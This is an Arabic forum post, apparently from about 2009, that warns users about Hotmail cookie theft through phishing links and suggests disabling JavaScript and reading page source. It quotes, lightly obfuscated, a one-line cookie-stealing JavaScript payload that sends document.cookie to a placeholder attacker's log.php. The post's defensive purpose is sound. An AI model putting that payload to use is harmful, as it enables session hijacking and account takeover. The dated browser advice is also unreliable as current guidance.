|
حماية بردك من الاختراق عبر سرقة الكوكيز بسم الله الرحمن الرحيم اليوم عملت شرح لموضوع سرقة بريد الهوت ميل وهى طريقة سرقة ملف الكوكيز الخاص بيك بعد دخولك على موقع السارق عارفين ان ثغرة xss للهوتميل اتقفلت من زمااان لكن ظهرت ثغرات جديده حاليا وهيا برايفت عند ناس ومناسبة الشرح ده اني لاحظت مئات الايميلات الثلاثية والثنائيات يخترقوهم هؤلاء اللي معاهم الثغرة ماعلينا اليوم بعد ما تقرأ الموضوع ده انسى ان واحد يضحك عليك :) نفترض وصلتلك رسالة على البريد مضمونها اهلاً بك يا فلان مبروك ربحت 10000 ريال ادخل على الرابط التالي علشان تاخد الـ 10000 ريال طبعا انت فرحان ودخلت علطول http://www.traidnt.net/vb/images/smilies/bigsmile.gif وبعد ما دخلت ما لقيت شيء http://www.traidnt.net/vb/images/smilies/tears.gif ممكن تلاقي صفحة بيضة ممكن تلاقي صورة بس http://www.traidnt.net/vb/images/smilies/no.gif تقول خسارة مليش نصيب في المبلغ http://www.traidnt.net/vb/images/smilies/tears.gif طبعا بعدها بدقايق كان المخترق جاتله رساله ملف الكوكيز تبعك ودخل غير كل البيانات http://www.traidnt.net/vb/images/smilies/crazy.gif وراح الاميل عليك طبعا انت تقول الاميل انا كنت حميه و ماقبلتش اي حاجة من حد وكيف اميلى ينسرق وبعدها طبعا السارق دخل سحب باقى البيانات ومنها الدومين واخترق منتداك كمان وكل ده من اميلك لاااااااااااااا http://www.traidnt.net/vb/images/smilies/crazy.gif http://www.traidnt.net/vb/images/smilies/bleh.gif دلوقتي بقى انا هخليك انت الى تضحك عليه وتحرق دمه http://www.traidnt.net/vb/images/smilies/bleh.gif خليكو معايا وانتبهو جيدا ده مثال للرسالة اللي جاتلك وكان فيها الرابط http://members.lycos.co.uk/neencom/up/up/1asd.gif استنة رايح فين http://www.traidnt.net/vb/images/smilies/crazy.gif اياك تفتح الرابط ! هتفتحه بس بعد ما تتبع الخطوات التالية : تعديل بسيط على اعدادات انترنت اكسبلورر روح على tools واختار internet options اللي هو اخر خيار http://members.lycos.co.uk/neencom/up/up/2assd.gif بعدين تروح على security واضغط على custom level http://www7.0zz0.com/2009/08/06/13/681523164.jpg بعد كده ابحث عن Active Scripting وهي خاصية الجافا سكربت قم بتعطيلها من خلال اختيارك Disable http://www7.0zz0.com/2009/08/06/13/582106296.jpg الان انت فى امان ولو فتحت الصفحة مش هينسرق ملف الكوكيز بتاعك ادخل على الصفحة بقلب جامد بعد التاكد من ان خاصية الجافا وجعلها دسبلاي طيب الان انت دخلت الصفحة وعاوز تتأكد اذا ده واحد هدفه يسرق ايميلك والا لأ تعمل ايه ؟! روح من القائمة view اختار Source هيفتحلك مصدر الصفحة في مفكره فيها اكواد الصفحة طيب ابحث فيها عن الكود ده http://gaza-hack.com/cc/images/statusicon/wol_error.gifهذه الصورة مصغره ... نقره على هذا الشريط لعرض الصوره بالمقاس الحقيقي ... المقاس الحقيقي 776x414 .http://www7.0zz0.com/2009/08/06/13/750458548.gif طبعا اكيد انتم شايفين ده عباره عن كود وفى اخره رابط السكربت بتاع المخترق علشان يسرق الكوكيز وده هو الملف بتاع سرقة الكوكيز معمول بخاصية الجافا سكربت عشان كده قلتلك عطل الجافا سكربت في المتصفح طبعا انت شفت الرابط الى فى اخر الكود www.xxx.com/vb/add.js طيب دلوقتى انت عرفت المصدر دلوقتى بقى انت عايز تحرق دمه http://www.traidnt.net/vb/images/smilies/santa_1.gif وتعرفه انك انسان عاقل وفاهم http://www.traidnt.net/vb/images/smilies/icon31.gif ادخل على المتصفح وحط رابط ملف سرقة الكوكيز بتاع المخترق www.xxx.com/vb/add.js هيطلب منك انك تحمله حمله على جهازك واضغط عليه كلك يمين واختار open with واختار النوت باد http://members.lycos.co.uk/neencom/up/up/7wqa.gif طبعا انت دخلت على ملف الجافا سكربت لقيته كده طبعا انت مش فاهم ايه ده ؟؟؟؟؟؟ اقولك انا يا سيدى ده ملف سرقة الكوكيز ما علينا مش هطول عليكم وهقولكم الباقى عايز دلوقتى تجنينه وتخنقه وتخليه يشيييييييييط http://www.traidnt.net/vb/images/smilies/crazy.gif lo cat ion .h ref='http://www.xxxx.com/xxx/log.php?in de x='+escape(d ocu ment.c oo kie); طبعا هو فى الملف log.php فيه اميل المخترق تمااام دلوقتى احنا عايزين نوصله التحية بتاعتنا ونعرفه ان لعبته اتقفشت http://www.traidnt.net/vb/images/smilies/bleh.gif هتكتب كود PHP: www.xxxxx.com/xxx/log.php?index= وهنا اكتب الكلام الى عايزه يوصل للضحية مثل http://gaza-hack.com/cc/images/statusicon/wol_error.gifهذه الصورة مصغره ... نقره على هذا الشريط لعرض الصوره بالمقاس الحقيقي ... المقاس الحقيقي 766x101 .http://members.lycos.co.uk/neencom/up/up/8qwd.gif طيب تمام طبعا علطول بيروح تبيلغ للمخترق ان الكوكيز بتاع وصله http://www.traidnt.net/vb/images/smilies/shiny01.gif وهيدخل وهو مبسوط وهيلاقى فى الرساله بدل الكوكيز الكلام بتاعك اللي انت كتبته شوفو مثال : http://members.lycos.co.uk/neencom/up/up/9wqdq.gif طبعا هو ممكن ينفجر من الغيظ http://www.traidnt.net/vb/images/smilies/crazy.gif كده خلص موضوعنا ونصيحة للجميع اعمل لايميلك سؤال سري واجابة وايميل بديل يكون بتاعك علشان تسترجعه وقت اللزوم وبرنامج حماية قوي علشان يحميك من ملفات التجسس http://www.boshretkhair.com/vb/image...es/ahmed42.gif واهم شيء استخدام متصفح غير الاكسبلورر http://www.traidnt.net/vb/images/smilies/shiny01.gif ممكن تستخدمو فايرفوكس مع التحديث دائما مثلي http://i35.tinypic.com/5d5ctj.gif تحياتي للجميع EGY-MaF!4 |
شكرا لك على الشرح الوافي |
MERCI |
شكرا الك علئ هذي الطريقة الجميلة |
| الساعة الآن 04:28 PM |
[ vBspiders.Com Network ]